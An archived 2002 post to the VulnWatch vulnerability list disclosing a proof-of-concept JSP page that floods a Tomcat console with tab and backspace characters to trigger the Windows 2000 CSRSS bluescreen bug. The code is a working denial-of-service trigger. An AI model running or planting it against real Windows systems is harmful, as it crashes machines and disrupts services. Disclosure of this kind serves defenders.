[VulnWatch] Bluescreen with a JSP on Win2k

From: Marc Schoenefeld (marc.schoenefeld@uni-muenster.de)
Date: 08/03/02


Date: Sat, 03 Aug 2002 08:53:27 +0200 (MES)
From: Marc Schoenefeld <marc.schoenefeld@uni-muenster.de>
To: vulnwatch@vulnwatch.org

Hi,

the following proof-of-concept simple demonstrates how to provoke
a bluescreen with a java application in certain circumstances.
If have a apache tomcat running on console window and invoke
the following jsp you will get a bluescreen on w2k because
of the CSRSS bug (backspace bug), which is still widespread in
many w32 installations, other operating systems (*ix) are not
affected, but if you browse a logfile from a linux machine
containing a CSRSS string on the console of a windows machine
this will crash also ....

Have fun with it
Marc

Following:bluescreen.jsp / Testet with Tomcat 4.0.4 startet from cmdline,
nt service version not affected during but during browsing the
stdout/stderr logfile
=========================Snip start=========================
<HTML>

<BODY>
<%
{
        char[] c9 = {9};
        char[] c8 = {8,8,8,8,8,8,8,8};
        String x = new String(c9);
        String y = new String(c8);
        String z = "";
        for (int i = 0 ; i < 4096; i++) {
            z += x + y;
        }
        System.out.println("<<<<<<<START>>>>>>>");
        System.out.println(z);
System.out.println(z);

        System.out.println("<<<<<<<END>>>>>>>");
    }

%>
<H1>still alive</H1>

</BODY>

</HTML>
========================snip end=====================

--
-- Mahatma Gandhi--
First they ignore you
Then they laugh at you
Then they fight you
Then you win
-- Mahatma Gandhi--

Marc Schönefeld Dipl. Wirtsch.-Inf. / Software Developer